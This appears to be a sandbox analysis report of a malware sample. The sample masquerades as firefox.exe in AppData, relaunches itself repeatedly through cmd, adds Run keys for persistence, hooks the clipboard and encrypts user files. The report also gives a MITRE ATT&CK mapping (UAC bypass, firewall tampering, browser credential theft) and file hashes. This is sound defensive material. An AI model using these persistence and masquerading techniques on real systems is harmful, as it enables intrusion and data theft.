C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21152
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21232
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21312
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21392
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21476
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10368
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10452
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10532
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10608
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10692
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:10740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10772
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10860
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:21552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21584
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21668
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21748
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21828
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21908
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21988
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22068
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22148
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22228
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22312
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22404
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22488
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22576
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22656
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22736
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22820
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:22920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:22968
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:23240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:23272
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:23376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:23412
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:23496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:23536
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Suspicious behavior: AddClipboardFormatListener
PID:23656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:23712
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:23800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:23836
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:23928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:23960
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Suspicious behavior: AddClipboardFormatListener
PID:24048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:24088
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:24144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:24180
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:24276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:24308
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:24408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:24456
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:24516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:24580
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:24656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:24700
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:24812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:24848
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:24924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:24964
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:25020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:25084
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Suspicious behavior: AddClipboardFormatListener
PID:25148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:25200
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:25252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:25284
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:25340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:25380
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:25428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:25460
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:25508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:25540
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
PID:25588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:25624
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Adds Run key to start application
PID:25672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:25704
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵PID:25812
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 7284⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:25844
-
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4560
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4044
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:6304
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:26200
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
3JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
3Active Setup
1Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
3Active Setup
1Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Indicator Removal
1File Deletion
1Modify Registry
9Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16B
MD5da5a094000b37a4e04a465c6d6bbc293
SHA1b4b879462fc2d90910afe5af37a933324c5f86a9
SHA2564d66bafcea9fe79a33b3d91b6a4236618789539c9d7630b4b118a8e96e198701
SHA5129446492ca0f55a9571794c2792f6dc18dee4857b282d1c0aac7569dbd56455b8d424cc801e2eb9245cfc93b228fad2dfcabc762a532e98f2a695d649b293f7eb
-
C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.encrypt
Filesize140KB
MD52c77adefdfbe014fb62ad974049e828f
SHA1e48c2312c4295c844288ea6c402f9386cc51d11a
SHA256989e46ef8aff059a4e973b4383e0e41d154247b2b1e25f2633f9633bdebe2d7a
SHA5124df2888e33f80049324985b9f04fafd3e3be07cdc57ae77bd1ca33dfb5be3c7c68d2ec3a73139520439360fa59b069a4f2ca4e01e84e07feb2a4615be44434d6
-
C:\ProgramData\Package Cache\{9F51D16B-42E8-4A4A-8228-75045541A2AE}v56.64.8781\dotnet-host-7.0.16-win-x64.msi.encrypt
Filesize744KB
MD556deaccc2392ca238d60ecc3b0d27664
SHA16a1626d090dd8ca269b709da6610b9a5b8efbaba
SHA2569771b44185ded8d4314162961987cf7ad35430e33f1e5e4d4ead580556835b96
SHA512a31403259c5969ba05518c1a01c9cc3e0c8356f060912f5e39939789cb7809fd3cc87feea17300f3491244f6ebd151f6c4b0f4d6f8fe45ee3b736b3f2fc4f2d8
-
Filesize
3.0MB
MD5407d7e7876d5be15bfeaf54f51e8c9cd
SHA1b0c6a52e8df06e27db7c90c7c1fda5f155c1d337
SHA25603ce645063d5ad0975947b0cbe1ba75ac1801ab8ff59c94ffa3375f82d19d50a
SHA5123c37cdd7567aed4f5ba4a1f9b53ef3433c5e0a42e9eb981812d4af8cb56f6d57f6c8a5431dcab9d1dc7b1c73b78f6175855cd000dbe5cab864bf9c19749321db
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT.encrypt
Filesize32B
MD5f3237bbe4306bedad354bbf5e034422f
SHA1e741ddd0f9bebc1f0f92156a29588b9ff5bcb22b
SHA256197092afe4b83735abe4527dabcdb1611a8e6b3aab6c315192fa7d77aa588471
SHA512df68c6780e88874c3ad0f99d4b3b907bec2ffb245079ac56161e3a6448cc4ca772d4a22506544eb6cd53560d9f612089895f2a70e4bfc96ea36e831f7c7b71c1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001.encrypt
Filesize48B
MD5f1ac3ec81b83a43c30d0fd9e35244660
SHA1c306d03a18837fe7fe77b2a8a8f6b0097f678b6d
SHA256ab6aba16cdfe80c6bfd3ddca1c1f5bd3ebcae37b281d9334f7a2e972d88347c7
SHA5129be08613a568f133022bf7d1f48fb0db3a2581f82bd6288d210fc2f14088bf2ba105695aa775a2a25650bff5dbeee30122578d5549f555fdba6bd095922af93d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index.encrypt
Filesize32B
MD5e9cd4ab7c97ea4c5ebc296eb9055e144
SHA13ad5a9b9358208b3df0d0a5a3d46cb516d19bdf7
SHA25677c2858bc280859278e5f4b9d9900ecdc401875e7e1e09d444dc603aef758eff
SHA512328e77fdb94cbd5a783cc751a05973f01ec87aba08fadc06deba7728f0e5ca3b5d214d6c8304f79a3899126c1a676e4d478691ce9fd408db8206769f2ce72947
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_0.encrypt
Filesize8KB
MD52c4fbecf0640659ddc7777d9257ebec2
SHA10c19240e9425f9c5063a764d0cba9b98af746426
SHA2561218414192aa4deead487810dc61ae28faf482b675c75fd59a27dfdca46bd40c
SHA5124e20ee85f88f49538ced3c368e93c1e26867c4f22891a1af2b9f6080911e69b8d0bebc77918b16f4c35d4ba310a2ae548bc0c738c44c7ee3659b4706ebe0c4ff
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_1.encrypt
Filesize264KB
MD510ed2063cf25b63857d7f135e7ee9711
SHA19b86e518fdd6cf3b6d7903fbce9471a19da9bc84
SHA256f72c4b75fbc3f81c4a3b0051e34ffacd011e40c3180b2d5c937adc62669bdd2f
SHA5128bc93d2de3cca4532a0360e99bc6877aae6126baedb88aa7cf43b14bb5065fcd276d419d5d779cf839e2819d0d1419d867faffbbc707d971ba6f6763993d88a2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_2.encrypt
Filesize8KB
MD5c6be081dec773f94cc72e044da310ad8
SHA1ed83425cc57ed4a4d5b4bafbe7f7f71dd4485348
SHA256a728b5540892ca6abf4cf0fadf7c1f367881b49cdbbc537263dd5d99e2c66a1c
SHA512f609f42c4a030533f0e8fe7896413a02ef8ae0575f63c39d2cbee9807a84e4b105116bb9debb6bc2b695cacb1186ad3002243abbd8b10d261c7ed7b2a60e7117
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_3.encrypt
Filesize8KB
MD50f07325043818b3c8dc717cce36ead70
SHA1b8897c8b7467894eda1b693560890aa62ed9fbaf
SHA256bb2e1fa07ece8650c688f5a1fd5208c94687329b8515776a6403d74e9695598a
SHA512706b6d30695fab17c3d6adf314a1e3606b842bbfb67f7a8c1656ed4140086fe8c40c303aa82a014e2ffab1852d515508bacee0c2c5f4952a809d50ef16f00d6a
-
Filesize
280B
MD5aa9afd16e8041e8c80250b50ea6899e4
SHA1a3a698d431952253255c343f2b35f74e73e63088
SHA2562bd7f856d73f78bc3a4de32b447b21babad42c009b19fcebe2f8cdeca2380926
SHA512344de0888df8851d957ca6fab055eb9e2f1aa6d958022c2c30442cd6aad4d158d0a99f8908184abc60fb1e0ccdd3d9395d8c0d37fc317d3700974c3348d4a5ff
-
Filesize
352B
MD5950c4dc65b3ce1822f957569307e46e2
SHA17735cb185bafdc04650731375c711d5affe613ae
SHA2569496a3f03f7d36f1b9b4a15e6a5e91f347794a7798550f15faefe2ee0ffbc75c
SHA5120dc2d7394030c298d357867a5307c4c65a7c3eb237024c035a257dc6882537a57d1225c73256977d8058ac8d50c2796e555e8ca0d6f5ecf7e3b84a41cd34cec4
-
Filesize
331B
MD5df3b6429621d2095fda81be95755e9a5
SHA1f0a3bd4bfbc8fab0996a9baa773a3eb247a4d738
SHA256c58398b0305ae08ff9f95196d64eab0febb5b1dd5d083f6b85ea39b36ab4e632
SHA512e04517c4d6bb1d99f34055c41f2800579d8aaf0b63e48b3c253df9ca9479ec4ab8e6c5e9f95dfd60cdb2c0ecbc396dfdbda6d752cc1a42b29d9c975c9ca4afd4
-
Filesize
384B
MD587cfa534d6c8606300b861523a62462f
SHA12d9d1e4c86687d9d1c17e59f8c6bdd8724aa8a2b
SHA256389d0755f233b2233d26bd4290bc2a3cf799435f8c237fac58a48b0da7d79c74
SHA51222771f4fb07fce8013a9cefc2850c5efb5ec2152df15078ebb9c6426332bbdabab3025f27639efae67d85fb7b6d5eb9a4565c14c6d5bce06c617a1a7d59c19cb
-
Filesize
211KB
MD563f12f93bb48b941fff69c46719067d3
SHA1dfd7a4322b3c8cc05df62689088ea64e644d0996
SHA25652489132b344860bef97cdfaf8bb2e20c11c9924f11567cd021f77488afd164f
